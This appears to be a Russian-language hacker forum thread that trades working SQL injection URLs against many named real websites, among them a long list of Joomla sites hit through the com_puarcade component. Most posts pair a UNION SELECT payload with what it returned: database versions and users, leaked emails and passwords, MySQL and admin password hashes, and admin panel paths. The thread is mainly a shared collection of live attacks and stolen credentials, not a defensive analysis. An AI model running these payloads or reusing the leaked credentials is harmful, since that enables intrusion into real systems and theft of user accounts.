SQL Инъекции

http://www.beatles.com/hub/article.php?page=-yeloSub'+union+select+1,2,version(),4/*&menuItem=the%20films

5 мускул,а дальше сам копай

 

http://nipponm.ru/carcard.html?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

4.1.22-log/nipponm9_base/nipponm9_nipponm@localhost
-----------------------------------------------------------------------------

http://www.brgu.ru/index.php?openpage=readnews.php&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7/*

4.1.20/bgu/admin@localhost


http://www.brgu.ru/index.php?openpage=readnews.php&id=-1+union+select+1,2,concat_ws(0x2F,email,password),4,5,6,7+from+users+limit+0,1/*

мейл/пароль
[email protected]/rbkkth100979

 

Прикольный вывод инфы - нада вбить адресс после перехода - в след. адресе будет инфа
я пока первый раз с таким встретился ))

5.0.44-log
таблы
Sites
Prop
Extensions
Content
Companys
-----------------------------------------------------

5.0.45-log
ничо путного не достал
только в табле passwds есть password - 12345 - но от чего он не понять ((

 

PostgreSQL
bpla.org

HTML:

http://www.bpla.org/index.php?go=events&evid=-1180052984+union+select+null,null,null,null,null,VERSION(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/&patlaw=efd8e696b67304cc30bb596be7c38061

Version() - PostgreSQL 7.2.1 on i686-pc-linux-gnu, compiled by GCC 2.96

HTML:

http://www.bpla.org/index.php?go=events&evid=-1180052984+union+select+null,null,null,null,null,USER,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/&patlaw=efd8e696b67304cc30bb596be7c38061

USER - bpla
zz-soft.com.pl

HTML:

http://www.zz-soft.com.pl/kolo/index.php?action=1&idkat=-21+union+select+0,concat(USER(),0x3a,DATABASE(),0x3a,VERSION()),2/*

USER:zdrojek_kolo@localhost
VERSION:4.1.22-standard-log
DATABASE:zdrojek_kolo

 

Любителям футбола посвящяется

 

HTML:

http://www.ziaruldebacau.ro/index.php?rubrica=9+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/*

4.1.22-standard-log
ziarul_iulian@localhost
ziarul_dbziar

HTML:

http://www.superlink.ro/index.php?id=-9999+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14/*

4.1.20-max-log
[email protected]
felici1_slink

HTML:

http://www.pnl.ro/index.php?id=pers&user=99999+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

4.1.20
web@localhost
Project_K

 

http://www.paintball.ru/next.php?id=99999+union+select+0,1,concat_ws(0x3a,version(),user(),database())/*
Я нешарю пока нихера но потихой начинаю понимать....

 

HTML:

http://job.pl.ua/search.php?searchtype=browse&whatlooking=vacancies&category=9999+union+select+1,2,username,userpass+from+poll_user/*

5.0.45-community-log
jobplu_admin@localhost
jobplu_base

admin/6512bd43d9caa6e02c990b0a82652dca

HTML:

http://www.theoneminutesjr.org/index.php?thisarticle=-9999+union+Select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15/*

4.1.22-log
root@localhost
mmmcms
Martin/zYjNDfJ0HwyS хеш походу, я несмог с ним справиться... как пасворд он не подходит
админка: /admin

HTML:

http://www.degrotegriepmeting.nl/public/index.php?thisarticle=999+union+select+1,2,3,4,concat_ws(0x3a,database(),user(),version()),6,7,8,9,10,11,12,13,14/*

5.0.30-Debian_0.dotdeb.1-log
[email protected]
griepmeting

HTML:

http://www.park.nl/park_cms/public/index.php?thisarticle=9999+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15/*

4.0.13-log
root@localhost
park_cms

 

Code:

http://www.mycaraudio.ru/newsdesk_info.php/newsdesk_id/58'%20and%20lower(substring(version(),1,1))='5

 

adage.com

Code:

http://adage.com/garfieldtheblog/post?article_id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6,7,8,9,10/*

4.1.15-emic-2.7.1-121-log:adage:adage@localhost

mysql.user:

Code:

http://adage.com/garfieldtheblog/post?article_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x71),0x71),4,5,6,7,8,9,10+from+mysql.user+limit+4,1/*

юзвери:

Code:

adageUser:5055955979f4e1e0
adage:*B26CE55D7330CED56ACCD1CFA9D8A18344CDC32F
root:*279E41BB816D40095DDA8AE1DDC59D42368BF351
trey:*427043D0F35CC5CFD50953AE7679EC4F0D458B99
circ:*FFDFE4D7155A660913C5CCB6AB6C20CA0C399AB8

 

Code:

http://www.hetelfde.nl/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.touring-england.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.greeknaturism.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://4web.ws/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.contra.lv/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://pdvguate.org/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://test.freedom-ru.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://degjomuzike.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://jco.in/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.animeaz.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.alternov.ru/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://modeshape.in/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://justchum.com/game/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://zoorb.ru/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://elmicom.com/zabava/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://myniteclub.com.au/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://lars.lischer.name/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.dijaki.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.bljesak.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://educatic.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://vanb.biz/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://darknight.biz/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*

 

http://www.tredu.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.fiestaintunisia.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.mojsalon.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.el-edu.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*

 

Привет.
Я новенький, решил зарегистрироваться .
Вот нашол скулю:

www.southworth.com

_http://www.southworth.com/catalog/admin/

^^^Там админку вроде нашёл, но мэйл для входа вывести не могу .

Версия 4.1.20

 

Page Rank 5

Code:

http://steve-o-meter.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.freegaming.de/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*
http://www.bljesak.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM+jos_users/*

 

www.gnn.tv может и боян - не проверял...

Code:

_http://www.gnn.tv/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database()),12,13,14,15,16,17,18,19,20,21,22,23/*

 

http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+from+mysql.user/*
root:1af55af32fcea9dc : 222111


http://www.agir.ro/articol.php?id_articol=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+from+agirro_forum.agir_users+limit+10,1/*
Gabriela:6f0f8609a2d424426fd0040d9ebff04e4c186b45

http://www.uvacres.org/faculty_page.php?id=1+union+select+1,2,3,4,5,6,user,password,9,10,11,12,13+from+users/*

 

Оператор связи cmda-стандарта в Узбекистане
5 мускул,вывод все сразу

http://www.cdma.uz/index.php?action=news&news_id=-608+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns/*

админко:

http://www.cdma.uz/admin/admin

 

www.gamesprut.ru

http://www.gamesprut.ru/frm/
SteelBear:d9b798fe05e2c739497125afe8bcdf79
Барс:318388c5ff8b380662b1d076971998f2
Hotel-15:8cca069025b8d1f4b96ac805dbc0eaa3:21071975
http://www.gamesprut.ru/phpmyadmin/
пасса от этого не нащёл

 

www.healthyskepticism.org

PR5 тИЦ -30 (что это ? )

Peter Mansfield::1a45d46f063cb5fd

 

Code:

http://comp-neat.ru/index2.php?GoAndRun=catalog&ID=-1+union+select+1,2,3,4,char(0xea,0xf3,0xf1,0xee,0xea,0x20,0xe4,0xe5,0xf0,0xfc,0xec,0xe0),2,7/*